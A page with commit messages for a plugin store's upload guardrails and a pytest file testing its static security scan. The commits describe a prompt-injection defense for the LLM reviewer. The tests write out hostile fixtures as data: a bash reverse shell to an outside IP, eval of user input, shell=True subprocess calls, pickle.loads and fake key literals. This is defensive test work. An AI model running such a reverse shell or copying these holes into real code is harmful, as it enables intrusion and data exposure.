* feat(store): flea-market upload guardrails + soft delete + JOIN-based admin queue
Adds an end-to-end guardrails pipeline for store uploads (manifest +
static-security + LLM review), persists blocked bundles for forensics,
introduces soft-delete (Archive) semantics, consolidates the legacy
/store/{id} surface into /marketplace/flea/{id}, and reworks the admin
queue so lifecycle filters read live entity visibility via LEFT JOIN
rather than a denormalized submission column.
Schema v29 → v35:
* v29 store_submissions table + store_entities.visibility_status
* v30 file_size, bundle_sha256, bundle_purged_at on submissions
* v31 reshape store_submissions (drop legacy unique on entity_id)
* v32 store_entities.archived_at/by + 'archived' visibility value
* v33 drop store_submissions.retry_count (unused)
* v34 ensure idx_store_submissions_entity exists post column-drop
* v35 broaden visibility_status enum + JOIN architecture cutover
Pipeline (src/store_guardrails/):
* Inline checks: manifest_check, static_scan, quality_check
* LLM review configurable haiku|sonnet|opus (default haiku)
* BackgroundTasks-driven async path with structured-output JSON
* Per-submitter daily quota (default 50)
* 30-day TTL purge job (POST /api/admin/run-blocked-purge)
* Bundle SHA256 + size persisted; sha256 survives purge for forensics
Visibility model:
* pending | approved | hidden | archived
* _enforce_visibility returns 404 (no leak) for non-owner non-admin
* Owner sees own non-approved entries via include_owner_id widening
* Install refused with 409 entity_not_approved when not approved
Soft-delete (DELETE /api/store/entities/{id}):
* Default = soft (visibility_status='archived'); existing installs
keep getting served the bundle so users don't lose the plugin
* ?hard=true admin-only: drops bundle + cascades user_store_installs
* Hard-delete preserves entity_id on submission as tombstone so
audit_log linkage survives for the activity timeline
Admin queue lifecycle (the JOIN refactor):
* Verdict (store_submissions.status) is immutable forensic record
* Lifecycle (store_entities.visibility_status) is live state
* /admin/store/submissions Archived chip translates to
`e.visibility_status='archived'` via LEFT JOIN — any path that
flips visibility surfaces in the queue immediately
* Detail page renders Status (verdict) and Entity lifecycle side by
side so admins see "approved at review, now archived" at a glance
URL consolidation:
* /store/{id} deleted (no redirect, stale bookmarks 404)
* /marketplace/flea/{id} is the canonical detail surface
* Three in-tree callers (upload-success, my-stack card, store
listing card) updated to point at the new URL
* Quarantine banner extracted to _quarantine_banner.html partial,
self-guarded, included from both flea detail templates
* Banner JS auto-refreshes when the verdict lands by polling
/api/marketplace/flea/{id}/detail (visibility_status +
submission_status — the latter is needed because blocked_llm
keeps the entity at visibility_status='pending')
Audit log resource format:
* runner.py emits prefixed `store_submission:{id}` (post-fix)
* Detail-page timeline query handles three patterns: prefixed
submission, helper-emitted `store_entity:{sub_id}`, and bare-id
legacy rows — all surface in the activity timeline
UX fixes:
* Owner sees Under review / Quarantined / Hidden banner with status
* Install button gray-disabled (not blue) when non-approved
* Owner cannot delete quarantined entries (403); admin can
* Admin queue: filter chips, sortable columns, paging, page-size
* Auto-refresh queue every 5s while pending rows are visible
* Store upload page file picker no longer opens twice (label →
input default action collided with explicit JS handler)
Tests: 168 passed across the guardrails suites (admin submissions,
store API, inline / LLM / purge guardrails, store repositories,
marketplace filter, schema version). New regression coverage
includes: archive surfaces via JOIN even when API path is bypassed;
deleted submission renders activity timeline (tombstone); flea
detail surfaces submission_status only for owner/admin; detail page
renders Entity lifecycle row; audit log resource format covers both
helper and runner paths.
* fix(store-guardrails): PR #233 follow-up — prompt injection, atomic PUT, BG race, schema, reaper, sort whitelist
Addresses 9 of the 23 findings from the PR #233 review (spec at
docs/superpowers/specs/2026-05-09-pr233-guardrails-fixes-spec.md).
Merge-gate items #1-#6 plus high-value mediums #7, #9-#12, #23.
Architectural items (#8 enum split, #14 factory) and pure
maintainability (#15-#22) deferred to follow-ups.
Security:
* #1 prompt injection — SYSTEM_PROMPT now passed via the SDK's
dedicated system= parameter; bundle wrapped in <bundle>...</bundle>
sentinels declared data-only by the system prompt; literal
sentinel strings in user content are escaped so an adversarial
README can't forge a close tag.
* #6 static scan honesty — module docstring + admin copy + docs
declare static scan as signal not gate; .md/.txt/.rst/.html/.json/
.yaml/.yml/.toml skipped to avoid false positives on prose.
AST mode for Python deferred (separate flag, FP comparison work).
Correctness:
* #2 PUT atomicity — bundles bake into plugin.staging-<rand>/
alongside live, atomic-rename on success; failed checks leave
live tree byte-for-byte intact.
* #3 BG-task race — set_visibility_if_pending guards verdict flips
to the (pending, hidden) review window; admin archives during
review survive; skipped flips audit-logged.
* #4 v35 NOT NULL/DEFAULT — schema v35→v36 re-applies them on
store_entities.visibility_status. CHECK constraint enforced
application-side (DuckDB ADD CHECK on existing column unsupported).
* #7 stuck-review reaper — reap_stuck_llm_reviews flips pending_llm
rows older than guardrails.stuck_review_grace_seconds (default
1800) to review_error. Scheduler runs every 15 min via new
/api/admin/run-reap-stuck-reviews. Set knob to 0 to disable.
* #9 quota counter — count_blocked_for_submitter_since now counts
blocked_inline + blocked_llm + review_error so a submitter
triggering only LLM-blocked verdicts is bounded.
* #10 missing risk_level — surfaces as review_error with
error='missing_risk_level' instead of silently defaulting to
'medium' (which looked like a model-decided block).
* #11 archived_at clear — set_visibility nulls archived_at +
archived_by when transitioning out of 'archived' so a future
read doesn't show stale archive forensics on an approved row.
Maintainability:
* #12 FSM doc comment — accurate insert/transition/lifecycle
description in src/db.py near store_submissions schema.
* #23 sort-key whitelist — admin queue rejects unknown sort keys
with 400 invalid_sort_key; substring-replace footgun removed.
Deferred (separate PRs):
* #5 quota race — proper fix requires asyncio.Lock spanning the
full pipeline; threading.Lock blocks event loop, DuckDB MVCC
doesn't help. API-level slowapi bounds worst case for now.
* #6 part 3 (AST static scan), #8 (enum split), #13 (import
bundle docs), #14 (factory consolidation), #15-#22 (maint).
Tests:
* New: tests/test_store_guardrails_prompt_injection.py (corpus +
trust-boundary invariants), tests/test_store_put_atomic.py,
tests/test_store_guardrails_reaper.py.
* Extended: test_store_guardrails_llm.py (system param, missing
risk_level, BG race), test_admin_store_submissions.py (quota
counter widening, sort whitelist 400), test_store_repositories.py
(un-archive metadata clear), test_db_schema_version.py (v36).
* Full suite: 3738 passed; 17 pre-existing baseline failures
unchanged (db migration tests, cli binary rename, catalog export,
user mgmt v5 backfill — confirmed by stash + rerun on clean tree).
266 lines
11 KiB
Python
266 lines
11 KiB
Python
"""Inline guardrail tests — the deterministic pre-LLM checks.
|
|
|
|
These tests pin the failure-mode catalogue: every regex/structural rule
|
|
exercised against a synthetic plugin tree, so adding or weakening a rule
|
|
is a visible diff in the test fixtures, not a silent regression.
|
|
"""
|
|
|
|
from __future__ import annotations
|
|
|
|
import shutil
|
|
import tempfile
|
|
from pathlib import Path
|
|
|
|
import pytest
|
|
|
|
from src.store_guardrails import run_inline_checks
|
|
from src.store_guardrails.runner import InlineResult
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Fixtures
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
@pytest.fixture
|
|
def plugin_dir():
|
|
d = Path(tempfile.mkdtemp(prefix="agnes_guardrail_test_"))
|
|
yield d
|
|
shutil.rmtree(d, ignore_errors=True)
|
|
|
|
|
|
def _write_skill_md(plugin_dir: Path, body: str = "Body that's long enough to satisfy the doc-length quality threshold." * 5) -> None:
|
|
(plugin_dir / "skills").mkdir(exist_ok=True)
|
|
(plugin_dir / "skills" / "test-skill").mkdir(exist_ok=True)
|
|
(plugin_dir / "skills" / "test-skill" / "SKILL.md").write_text(
|
|
f"---\nname: test-skill\ndescription: A test skill for guardrails\n---\n\n{body}\n",
|
|
encoding="utf-8",
|
|
)
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Manifest checks
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestManifestCheck:
|
|
def test_skill_with_valid_skill_md_passes(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="OK skill description")
|
|
assert r.manifest["status"] == "pass"
|
|
assert r.passed
|
|
|
|
def test_skill_missing_skill_md_fails(self, plugin_dir):
|
|
# No SKILL.md anywhere.
|
|
(plugin_dir / "README.md").write_text("nope" * 50)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Missing-md skill description")
|
|
assert r.manifest["status"] == "fail"
|
|
assert "missing_skill_md" in r.manifest["issues"]
|
|
assert not r.passed
|
|
|
|
def test_plugin_missing_manifest_fails(self, plugin_dir):
|
|
(plugin_dir / "README.md").write_text("nope" * 100)
|
|
r = run_inline_checks(plugin_dir, type_="plugin", description="Missing-manifest plugin description")
|
|
assert r.manifest["status"] == "fail"
|
|
assert "missing_plugin_manifest" in r.manifest["issues"]
|
|
assert not r.passed
|
|
|
|
def test_plugin_invalid_json_fails(self, plugin_dir):
|
|
(plugin_dir / ".claude-plugin").mkdir()
|
|
(plugin_dir / ".claude-plugin" / "plugin.json").write_text("{ this is not json")
|
|
(plugin_dir / "README.md").write_text("hi" * 200)
|
|
r = run_inline_checks(plugin_dir, type_="plugin", description="Invalid-json plugin description")
|
|
assert r.manifest["status"] == "fail"
|
|
assert "plugin_manifest_invalid_json" in r.manifest["issues"]
|
|
|
|
def test_plugin_invalid_name_fails(self, plugin_dir):
|
|
(plugin_dir / ".claude-plugin").mkdir()
|
|
(plugin_dir / ".claude-plugin" / "plugin.json").write_text(
|
|
'{"name": "spaces are bad", "version": "0.1.0"}'
|
|
)
|
|
(plugin_dir / "README.md").write_text("hi" * 200)
|
|
r = run_inline_checks(plugin_dir, type_="plugin", description="Bad-name plugin description")
|
|
assert "plugin_manifest_invalid_name" in r.manifest["issues"]
|
|
|
|
def test_unsupported_type_fails(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
r = run_inline_checks(plugin_dir, type_="bogus", description="x" * 50)
|
|
assert r.manifest["status"] == "fail"
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Static security scan
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestStaticScan:
|
|
def test_python_eval_flagged(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
(plugin_dir / "run.py").write_text(
|
|
"user_input = input()\nresult = eval(user_input)\n"
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Bad python skill description")
|
|
assert not r.passed
|
|
cats = {f["category"] for f in r.static_security["findings"]}
|
|
assert "code_exec" in cats
|
|
|
|
def test_bash_eval_flagged(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
(plugin_dir / "run.sh").write_text("#!/bin/sh\neval $1\n")
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Bad bash skill description")
|
|
assert not r.passed
|
|
|
|
def test_subprocess_shell_true_flagged(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
(plugin_dir / "wrap.py").write_text(
|
|
"import subprocess\nsubprocess.run(cmd, shell=True)\n"
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Subprocess shell skill description")
|
|
assert not r.passed
|
|
|
|
def test_pickle_loads_flagged(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
(plugin_dir / "loader.py").write_text(
|
|
"import pickle\nobj = pickle.loads(blob)\n"
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Pickle skill description")
|
|
assert not r.passed
|
|
|
|
def test_aws_key_literal_flagged(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
(plugin_dir / "creds.py").write_text(
|
|
'AWS_KEY = "AKIAIOSFODNN7EXAMPLE"\n'
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="AWS skill description")
|
|
cats = {f["category"] for f in r.static_security["findings"]}
|
|
assert "secret_leak" in cats
|
|
|
|
def test_anthropic_key_literal_flagged(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
(plugin_dir / "creds.py").write_text(
|
|
'KEY = "sk-1234567890abcdef1234567890abcdef12345678"\n'
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Anthropic skill description")
|
|
cats = {f["category"] for f in r.static_security["findings"]}
|
|
assert "secret_leak" in cats
|
|
|
|
def test_reverse_shell_flagged(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
(plugin_dir / "init.sh").write_text(
|
|
"#!/bin/sh\nbash -i >& /dev/tcp/8.8.8.8/4444 0>&1\n"
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Reverse-shell skill description")
|
|
cats = {f["category"] for f in r.static_security["findings"]}
|
|
assert "reverse_shell" in cats
|
|
|
|
def test_template_aware_eval_inside_placeholder_not_flagged(self, plugin_dir):
|
|
"""Eval-like text inside ``{{var}}`` is documentation, not exec."""
|
|
_write_skill_md(plugin_dir)
|
|
# README mentioning what placeholders look like — must NOT trip
|
|
# the eval rule.
|
|
(plugin_dir / "skills" / "test-skill" / "EXAMPLE.md").write_text(
|
|
"Use the placeholder like this: {{eval(USER_INPUT)}}\n" * 5
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Templated skill description")
|
|
# No code_exec finding from the templated text.
|
|
cats = {f["category"] for f in r.static_security["findings"]}
|
|
assert "code_exec" not in cats
|
|
|
|
def test_clean_skill_passes(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
(plugin_dir / "skills" / "test-skill" / "helper.py").write_text(
|
|
"def hello():\n return 'world'\n"
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Clean skill description")
|
|
assert r.passed
|
|
assert r.static_security["status"] == "pass"
|
|
|
|
def test_eval_in_markdown_not_flagged(self, plugin_dir):
|
|
"""#6 — documentation files (.md, .txt, .rst) skip static scan
|
|
so prose discussing 'eval' / 'exec' doesn't trip false positives.
|
|
Same string in a .py file MUST still flag (locked in
|
|
test_python_eval_flagged)."""
|
|
_write_skill_md(plugin_dir)
|
|
# README that legitimately discusses eval — must NOT flag.
|
|
(plugin_dir / "skills" / "test-skill" / "NOTES.md").write_text(
|
|
"# Notes\n\n"
|
|
"Avoid `eval(user_input)` in production code — see OWASP.\n"
|
|
"Same applies to `exec(arbitrary_text)`.\n"
|
|
)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Doc-only skill")
|
|
cats = {f["category"] for f in r.static_security["findings"]}
|
|
assert "code_exec" not in cats, (
|
|
"static scan flagged 'eval' in a .md file — docs should skip"
|
|
)
|
|
assert r.passed
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Quality + templating
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestQualityCheck:
|
|
def test_template_recommendation_when_zero_placeholders(self, plugin_dir):
|
|
_write_skill_md(plugin_dir, body="Plain text without parameterization." * 10)
|
|
r = run_inline_checks(
|
|
plugin_dir, type_="skill",
|
|
description="Plain skill, no template hooks at all here",
|
|
)
|
|
assert r.quality["template_placeholders"] == 0
|
|
assert r.quality["template_recommendation"] is not None
|
|
|
|
def test_no_recommendation_when_placeholders_present(self, plugin_dir):
|
|
_write_skill_md(
|
|
plugin_dir,
|
|
body="Sends results to {{SLACK_CHANNEL}} for {{TEAM_NAME}}." * 5,
|
|
)
|
|
r = run_inline_checks(
|
|
plugin_dir, type_="skill",
|
|
description="Templated skill with parameterization",
|
|
)
|
|
assert r.quality["template_placeholders"] >= 2
|
|
assert r.quality["template_recommendation"] is None
|
|
|
|
def test_short_description_warns(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="x")
|
|
assert r.quality["status"] == "warn"
|
|
assert "description_too_short" in r.quality["issues"]
|
|
# Quality warn never blocks publication on its own.
|
|
assert r.passed
|
|
|
|
def test_lorem_ipsum_warns(self, plugin_dir):
|
|
(plugin_dir / "skills").mkdir()
|
|
(plugin_dir / "skills" / "x").mkdir()
|
|
(plugin_dir / "skills" / "x" / "SKILL.md").write_text(
|
|
"---\nname: x\n---\n\nLorem ipsum dolor sit amet, consectetur adipiscing elit.\n" * 5
|
|
)
|
|
r = run_inline_checks(
|
|
plugin_dir, type_="skill", description="Slop skill description",
|
|
)
|
|
assert any("lorem_ipsum" in i for i in r.quality["issues"])
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Aggregation
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestInlineResult:
|
|
def test_to_response_dict_shape(self, plugin_dir):
|
|
_write_skill_md(plugin_dir)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="Shape probe skill description")
|
|
d = r.to_response_dict()
|
|
assert set(d.keys()) == {"manifest", "static_security", "quality"}
|
|
|
|
def test_passed_ignores_quality_warn(self, plugin_dir):
|
|
"""Quality 'warn' must not flip InlineResult.passed to False — that
|
|
would block uploads on a missing description, which is over-strict.
|
|
"""
|
|
_write_skill_md(plugin_dir)
|
|
r = run_inline_checks(plugin_dir, type_="skill", description="x") # short → warn
|
|
assert r.quality["status"] == "warn"
|
|
assert r.manifest["status"] == "pass"
|
|
assert r.static_security["status"] == "pass"
|
|
assert r.passed
|